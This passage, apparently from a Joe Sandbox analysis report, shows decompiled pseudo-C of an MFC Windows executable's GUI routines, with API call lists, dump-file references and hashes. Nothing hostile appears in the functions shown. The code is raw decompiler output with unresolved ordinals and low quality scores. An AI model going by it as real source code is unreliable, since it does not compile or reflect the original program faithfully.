    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1779$#4055$#2642#3092$#1783#4710ChildEnumInvalidateRectWindows
    • String ID:
    • API String ID: 2376213114-0
    • Opcode ID: f8115e8eb3e7628ca07abfe0e01b67bdfca0fd9ff5350f82b8b87f410a1ed920
    • Instruction ID: 5d9428708d7304940c2635c01393c5de37a50ceac507740f9118c605f217e1c7
    • Opcode Fuzzy Hash: f8115e8eb3e7628ca07abfe0e01b67bdfca0fd9ff5350f82b8b87f410a1ed920
    • Instruction Fuzzy Hash: 6031C5707447106FD615A776C852EFA76D9BB4DB04F0404BEFAC6CB3C2CA98AE0047A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E0041903F(void* __ecx) {
    				intOrPtr _t34;
    				signed int _t38;
    				void* _t42;
    				void* _t57;
    
    				_t57 = __ecx;
    				L0043DF94();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x124) & 0x000000ff);
    				_push(0x4e25);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x129) & 0x000000ff);
    				_push(0x8016);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x12a) & 0x000000ff);
    				_push(0x8017);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x130) & 0x000000ff);
    				_push(0x8018);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x12c) & 0x000000ff);
    				_push(0x4e26);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x14c) & 0x000000ff);
    				_push(0x801a);
    				L0043DF82();
    				_t54 = __ecx + 0xac;
    				E0040CF63(__ecx + 0xac, 0x323232, 1);
    				if(__ecx != 0) {
    					_t34 =  *((intOrPtr*)(__ecx + 0x20));
    				} else {
    					_t34 = 0;
    				}
    				E0040CF2E(_t54, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t34);
    				_t38 =  *(_t57 + 0x68) >> 0x0000000f & 0x00000001;
    				_push(_t38);
    				_push(0x8019);
    				L0043DF82();
    				_push(0x442);
    				L0043E066();
    				SendMessageA( *(_t38 + 0x20), 0x401,  *(_t57 + 0x68) & 0xffff7fff, 0);
    				 *((intOrPtr*)(_t57 + 0x1c0)) =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x64)) + 0x35c));
    				_t42 = 1;
    				return _t42;
    			}







    Instruction addresses (one per decompiled statement above): 0x00419041, 0x00419043, 0x00419054, 0x00419055, 0x0041905a, 0x0041906b, 0x0041906c, 0x00419071, 0x00419082, 0x00419083, 0x00419088, 0x00419099, 0x0041909a, 0x0041909f, 0x004190b0, 0x004190b1, 0x004190b6, 0x004190c7, 0x004190c8, 0x004190cd, 0x004190d2, 0x004190e1, 0x004190e8, 0x004190ee, 0x004190ea, 0x004190ea, 0x004190ea, 0x00419106, 0x00419113, 0x00419116, 0x00419117, 0x0041911c, 0x00419124, 0x00419131, 0x00419141, 0x00419152, 0x00419158, 0x0041915b

    APIs
    • #4710.MFC42 ref: 00419043
    • #1779.MFC42(00004E25,?), ref: 0041905A
    • #1779.MFC42(00008016,?,00004E25,?), ref: 00419071
    • #1779.MFC42(00008017,?,00008016,?,00004E25,?), ref: 00419088
    • #1779.MFC42(00008018,?,00008017,?,00008016,?,00004E25,?), ref: 0041909F
    • #1779.MFC42(00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 004190B6
    • #1779.MFC42(0000801A,?,00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 004190CD
      • Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B
    • #1779.MFC42(00008019,?,0000801A,?,00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 0041911C
    • #3092.MFC42(00000442,00008019,?,0000801A,?,00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 00419131
    • SendMessageA.USER32(?,00000401,?,00000000), ref: 00419141
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1779$#3092#4710InvalidateMessageRectSend
    • String ID:
    • API String ID: 1704691092-0
    • Opcode ID: b0524498d10e1b9c774926ac50a36f07c8fadfef51fba5635e165ba53e2b3176
    • Instruction ID: 93440e7a2566d6434b83e793b248988a0494eceed0647d4c524d84c8b42cfcfd
    • Opcode Fuzzy Hash: b0524498d10e1b9c774926ac50a36f07c8fadfef51fba5635e165ba53e2b3176
    • Instruction Fuzzy Hash: 2421D3313407506FEA209765CC52FBA36D9BB4DB14F04046AFAC2DF3D2C9A4FA0097A5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040D26E(intOrPtr* __ecx, void* __eflags) {
    				void* __esi;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    				intOrPtr* _t48;
    				intOrPtr* _t72;
    				intOrPtr* _t75;
    				void* _t77;
    
    				E0043E4E0(0x43ff0b, _t77);
    				_push(__ecx);
    				_t75 = __ecx;
    				_push( *((intOrPtr*)(_t77 + 8)));
    				 *((intOrPtr*)(_t77 - 0x10)) = __ecx;
    				_push(0x75);
    				L0043E054();
    				 *((intOrPtr*)(_t77 - 4)) = 0;
    				E0040CE10(__ecx + 0x60, __eflags);
    				 *((char*)(_t77 - 4)) = 1;
    				_t43 = E0040CE10(__ecx + 0x174, __eflags);
    				 *((char*)(_t77 - 4)) = 2;
    				L0043DF64();
    				 *((intOrPtr*)(__ecx + 0x288)) = 0x446660;
    				 *((char*)(_t77 - 4)) = 3;
    				_t44 = L00404F04(_t43, __ecx + 0x2c8, __ecx);
    				 *((char*)(_t77 - 4)) = 4;
    				_t45 = L00404F04(_t44, _t75 + 0x31c, _t75);
    				 *((char*)(_t77 - 4)) = 5;
    				L00404F04(_t45, _t75 + 0x370, _t75);
    				 *((char*)(_t77 - 4)) = 6;
    				E0040E07A(_t75 + 0x3c4);
    				 *((char*)(_t77 - 4)) = 7;
    				L0043DF64();
    				 *((intOrPtr*)(_t75 + 0x434)) = 0x446a40;
    				 *((char*)(_t77 - 4)) = 8;
    				L0043E1EC();
    				 *((char*)(_t77 - 4)) = 9;
    				L0043DDD8();
    				 *((char*)(_t77 - 4)) = 0xa;
    				L0043DDD8();
    				_t48 = _t75 + 0x4a8;
    				 *_t48 = 0x446a2c;
    				 *((intOrPtr*)(_t48 + 4)) = 0;
    				 *((intOrPtr*)(_t48 + 8)) = 0x11;
    				 *((intOrPtr*)(_t48 + 0xc)) = 0;
    				 *((intOrPtr*)(_t48 + 0x10)) = 0;
    				 *((intOrPtr*)(_t48 + 0x14)) = 0;
    				 *((intOrPtr*)(_t48 + 0x18)) = 0xa;
    				_t72 = _t75 + 0x4c4;
    				 *((intOrPtr*)(_t72 + 4)) = 0;
    				 *_t72 = 0x446a18;
    				 *(_t75 + 0x488) =  *(_t75 + 0x488) | 0xffffffff;
    				_push(0xffffffff);
    				_push(0);
    				 *((char*)(_t77 - 4)) = 0xd;
    				 *_t75 = 0x446940;
    				L0043E1E6();
    				 *((intOrPtr*)(_t75 + 0x4a4)) = 0;
    				_push(CreateSolidBrush(0xefefef));
    				L0043DD60();
    				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
    				return _t75;
    			}
    0x0040d273
    0x0040d278
    0x0040d27c
    0x0040d27e
    0x0040d281
    0x0040d284
    0x0040d286
    0x0040d290
    0x0040d293
    0x0040d29e
    0x0040d2a2
    0x0040d2ad
    0x0040d2b3
    0x0040d2b8
    0x0040d2c4
    0x0040d2c8
    0x0040d2d3
    0x0040d2d7
    0x0040d2e2
    0x0040d2e6
    0x0040d2f1
    0x0040d2f5
    0x0040d300
    0x0040d306
    0x0040d30b
    0x0040d317
    0x0040d31b
    0x0040d326
    0x0040d32a
    0x0040d335
    0x0040d339
    0x0040d33e
    0x0040d344
    0x0040d34a
    0x0040d34d
    0x0040d354
    0x0040d357
    0x0040d35a
    0x0040d35d
    0x0040d364
    0x0040d36a
    0x0040d36d
    0x0040d373
    0x0040d37a
    0x0040d37c
    0x0040d383
    0x0040d387
    0x0040d38d
    0x0040d397
    0x0040d3a3
    0x0040d3a6
    0x0040d3b3
    0x0040d3bb

    APIs
    • __EH_prolog.LIBCMT ref: 0040D273
    • #324.MFC42(00000075,?), ref: 0040D286
      • Part of subcall function 0040CE10: __EH_prolog.LIBCMT ref: 0040CE15
    • #567.MFC42(00000075,?), ref: 0040D2B3
      • Part of subcall function 0040E07A: __EH_prolog.LIBCMT ref: 0040E07F
      • Part of subcall function 0040E07A: #567.MFC42(?,?,0040D2FA), ref: 0040E08B
      • Part of subcall function 0040E07A: #540.MFC42(?,?,0040D2FA), ref: 0040E09D
      • Part of subcall function 0040E07A: #540.MFC42 ref: 0040E0C7
      • Part of subcall function 0040E07A: GetSysColor.USER32(0000000F), ref: 0040E0D4
    • #567.MFC42 ref: 0040D306
    • #500.MFC42 ref: 0040D31B
    • #540.MFC42 ref: 0040D32A
    • #540.MFC42 ref: 0040D339
    • #6142.MFC42(00000000,000000FF), ref: 0040D38D
    • CreateSolidBrush.GDI32(00EFEFEF), ref: 0040D39D
    • #1641.MFC42(00000000), ref: 0040D3A6
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#567H_prolog$#1641#324#500#6142BrushColorCreateSolid
    • String ID:
    • API String ID: 927556981-0
    • Opcode ID: edc8c16fe86f3345d703983bcea4217b48ccae285efed037085683e0aa212f0e
    • Instruction ID: 2131c017913df267b86e7f1ce3b4eccc668aff03f2f718d2f0058d1ec14f5303
    • Opcode Fuzzy Hash: edc8c16fe86f3345d703983bcea4217b48ccae285efed037085683e0aa212f0e
    • Instruction Fuzzy Hash: 5231CEB0505740DED711EF65C585BDDFBE4AF59318F00859EE59A233C2CBB82608CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0041BCD0(signed int __eax, void* __ecx) {
    				signed int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t53;
    				signed int _t54;
    				signed int _t55;
    				signed int _t56;
    				signed int _t60;
    				signed int _t61;
    
    				_push(1);
    				L0043E08A();
    				_push(0x46a);
    				L0043DFA6();
    				_push(0x46e);
    				 *((char*)( *(__ecx + 0x60) + 0x360)) = __eax & 0xffffff00 | __eax != 0x00000000;
    				_t50 =  *(__ecx + 0x60);
    				 *((char*)(_t50 + 0x361)) = 1;
    				L0043DFA6();
    				_push(0x46d);
    				_t51 = _t50 & 0xffffff00 | _t50 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x365) = _t51;
    				L0043DFA6();
    				_push(0x46f);
    				_t52 = _t51 & 0xffffff00 | _t51 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x362) = _t52;
    				L0043DFA6();
    				_push(0x470);
    				_t53 = _t52 & 0xffffff00 | _t52 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x364) = _t53;
    				L0043DFA6();
    				_push(0x473);
    				_t54 = _t53 & 0xffffff00 | _t53 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x366) = _t54;
    				L0043DFA6();
    				_push(0x474);
    				_t55 = _t54 & 0xffffff00 | _t54 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x367) = _t55;
    				L0043DFA6();
    				_push(0x497);
    				_t56 = _t55 & 0xffffff00 | _t55 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x363) = _t56;
    				L0043DFA6();
    				_push(0x47c);
    				 *((char*)( *(__ecx + 0x60) + 0x14f)) = _t56 & 0xffffff00 | _t56 != 0x00000000;
    				 *((intOrPtr*)( *(__ecx + 0x60) + 0x66c)) =  *((intOrPtr*)(__ecx + 0x178));
    				 *((intOrPtr*)( *(__ecx + 0x60) + 0x670)) =  *((intOrPtr*)(__ecx + 0x17c));
    				_t60 =  *(__ecx + 0x60);
    				 *((intOrPtr*)(_t60 + 0x674)) =  *((intOrPtr*)(__ecx + 0x180));
    				L0043DFA6();
    				_t61 = _t60 & 0xffffff00 | _t60 != 0x00000000;
    				 *( *(__ecx + 0x60) + 0x140) = _t61;
    				return _t61;
    			}
    0x0041bcd3
    0x0041bcd5
    0x0041bcda
    0x0041bce1
    0x0041bce9
    0x0041bcf3
    0x0041bcf9
    0x0041bcfe
    0x0041bd05
    0x0041bd0d
    0x0041bd14
    0x0041bd17
    0x0041bd1f
    0x0041bd27
    0x0041bd2e
    0x0041bd31
    0x0041bd39
    0x0041bd41
    0x0041bd48
    0x0041bd4b
    0x0041bd53
    0x0041bd5b
    0x0041bd62
    0x0041bd65
    0x0041bd6d
    0x0041bd75
    0x0041bd7c
    0x0041bd7f
    0x0041bd87
    0x0041bd8f
    0x0041bd96
    0x0041bd99
    0x0041bda1
    0x0041bda9
    0x0041bdb3
    0x0041bdc2
    0x0041bdd1
    0x0041bdd7
    0x0041bde0
    0x0041bde8
    0x0041bdf3
    0x0041bdf6
    0x0041bdfc

    APIs
    • #6334.MFC42(00000001), ref: 0041BCD5
    • #4055.MFC42(0000046A,00000001), ref: 0041BCE1
    • #4055.MFC42 ref: 0041BD05
    • #4055.MFC42(0000046D), ref: 0041BD1F
    • #4055.MFC42(0000046F,0000046D), ref: 0041BD39
    • #4055.MFC42(00000470,0000046F,0000046D), ref: 0041BD53
    • #4055.MFC42(00000473,00000470,0000046F,0000046D), ref: 0041BD6D
    • #4055.MFC42(00000474,00000473,00000470,0000046F,0000046D), ref: 0041BD87
    • #4055.MFC42(00000497,00000474,00000473,00000470,0000046F,0000046D), ref: 0041BDA1
    • #4055.MFC42(0000047C,00000497,00000474,00000473,00000470,0000046F,0000046D), ref: 0041BDE8
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4055$#6334
    • String ID:
    • API String ID: 810029699-0
    • Opcode ID: 0ebbaab8c8e84e9ccbda69de9f027e14ff70b5d8cd3daf76ef743f0e6687b9e9
    • Instruction ID: 2f81da32a200df75c6235946360b626305bd2896ebb1ccece7627e85b4128081
    • Opcode Fuzzy Hash: 0ebbaab8c8e84e9ccbda69de9f027e14ff70b5d8cd3daf76ef743f0e6687b9e9
    • Instruction Fuzzy Hash: 46319131309B40CFD315DB768552AEA36A66F99714F08406DE98B4B3C3DB16AA02CB49
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E0041B23E(void* __ecx) {
    				void* __esi;
    				void* _t5;
    				void* _t6;
    				struct HINSTANCE__* _t7;
    				struct HINSTANCE__* _t9;
    				void* _t12;
    				void* _t21;
    
    				_t21 = __ecx;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(1);
    				_t6 = L00404F47(_t5, __ecx + 0xbc, __ecx);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t21);
    				_push(2);
    				_t7 = L00404F47(_t6, _t21 + 0x68, _t21);
    				_push(0);
    				_push(0x40000);
    				_push(0);
    				L0043E2F4();
    				L0043E1C2();
    				_push(0x80);
    				_push(0xe);
    				L0043DD78();
    				_t9 = SendMessageA( *(_t21 + 0x20), 0x80, 0, LoadIconA(_t7, 0x80));
    				L0043E1C2();
    				_push(0x80);
    				_push(0xe);
    				L0043DD78();
    				SendMessageA( *(_t21 + 0x20), 0x80, 1, LoadIconA(_t9, 0x80));
    				_t12 = 1;
    				return _t12;
    			}
    0x0041b242
    0x0041b244
    0x0041b24e
    0x0041b255
    0x0041b25b
    0x0041b25c
    0x0041b25d
    0x0041b25e
    0x0041b266
    0x0041b26b
    0x0041b26d
    0x0041b26e
    0x0041b26f
    0x0041b270
    0x0041b271
    0x0041b276
    0x0041b27f
    0x0041b280
    0x0041b285
    0x0041b286
    0x0041b28b
    0x0041b295
    0x0041b296
    0x0041b299
    0x0041b2b3
    0x0041b2b5
    0x0041b2ba
    0x0041b2bb
    0x0041b2be
    0x0041b2cd
    0x0041b2d1
    0x0041b2d6

    APIs
    • #4710.MFC42 ref: 0041B244
    • #4287.MFC42(00000000,00040000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B286
    • #1168.MFC42(00000000,00040000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B28B
    • #1146.MFC42(00000080,0000000E,00000080,00000000,00040000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B299
    • LoadIconA.USER32(00000000,00000080), ref: 0041B2A5
    • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0041B2B3
    • #1168.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B2B5
    • #1146.MFC42(00000080,0000000E,00000080,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B2BE
    • LoadIconA.USER32(00000000,00000080), ref: 0041B2C4
    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0041B2CD
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1146#1168IconLoadMessageSend$#4287#4710
    • String ID:
    • API String ID: 890588306-0
    • Opcode ID: 4c22c99634d071bd2b96469c5cbb6071bf267ddeb5c90a36158af7cf03b00435
    • Instruction ID: 237f18c3cad0eea6a487e205c47f1463ac2bb804c5632c790e1461885e6a3942
    • Opcode Fuzzy Hash: 4c22c99634d071bd2b96469c5cbb6071bf267ddeb5c90a36158af7cf03b00435
    • Instruction Fuzzy Hash: A30175712417483BE53076639C86F6B7A6DDBC6B58F00042EB245661D28DAA7C40C278
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E00419DC7(intOrPtr* __ecx) {
    				void* __esi;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				intOrPtr* _t54;
    				void* _t56;
    
    				E0043E4E0(0x4412dd, _t56);
    				_push(__ecx);
    				_t54 = __ecx;
    				_push( *((intOrPtr*)(_t56 + 8)));
    				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
    				_push(0xa9);
    				L0043E054();
    				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
    				L0043DDD8();
    				 *(_t56 - 4) = 1;
    				L0043DDD8();
    				 *(_t56 - 4) = 2;
    				_t28 = E0040E07A(__ecx + 0x68);
    				 *(_t56 - 4) = 3;
    				L0043DDD8();
    				 *(_t56 - 4) = 4;
    				L0043DDD8();
    				 *(_t56 - 4) = 5;
    				L0043DDD8();
    				 *(_t56 - 4) = 6;
    				_t29 = L00404F04(_t28, __ecx + 0xe4, __ecx);
    				 *(_t56 - 4) = 7;
    				_t30 = L00404F04(_t29, _t54 + 0x138, _t54);
    				 *(_t56 - 4) = 8;
    				L00404F04(_t30, _t54 + 0x18c, _t54);
    				_push(0x4550cc);
    				 *(_t56 - 4) = 9;
    				 *_t54 = 0x447d68;
    				L0043DDD2();
    				_push(0x4550cc);
    				L0043DDD2();
    				_push(0x4550cc);
    				L0043DDD2();
    				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
    				return _t54;
    			}
    0x00419dcc
    0x00419dd1
    0x00419dd5
    0x00419dd7
    0x00419dda
    0x00419ddd
    0x00419de2
    0x00419de7
    0x00419dee
    0x00419df6
    0x00419dfa
    0x00419e02
    0x00419e06
    0x00419e11
    0x00419e17
    0x00419e22
    0x00419e26
    0x00419e31
    0x00419e35
    0x00419e40
    0x00419e44
    0x00419e4f
    0x00419e53
    0x00419e5e
    0x00419e62
    0x00419e6e
    0x00419e6f
    0x00419e73
    0x00419e79
    0x00419e7e
    0x00419e85
    0x00419e8a
    0x00419e91
    0x00419e9e
    0x00419ea6

    APIs
    • __EH_prolog.LIBCMT ref: 00419DCC
    • #324.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DE2
    • #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DEE
    • #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DFA
      • Part of subcall function 0040E07A: __EH_prolog.LIBCMT ref: 0040E07F
      • Part of subcall function 0040E07A: #567.MFC42(?,?,0040D2FA), ref: 0040E08B
      • Part of subcall function 0040E07A: #540.MFC42(?,?,0040D2FA), ref: 0040E09D
      • Part of subcall function 0040E07A: #540.MFC42 ref: 0040E0C7
      • Part of subcall function 0040E07A: GetSysColor.USER32(0000000F), ref: 0040E0D4
    • #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E17
    • #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E26
    • #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E35
    • #860.MFC42(004550CC,?,?,?,?,00419C38,00000000), ref: 00419E79
    • #860.MFC42(004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E85
    • #860.MFC42(004550CC,004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E91
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
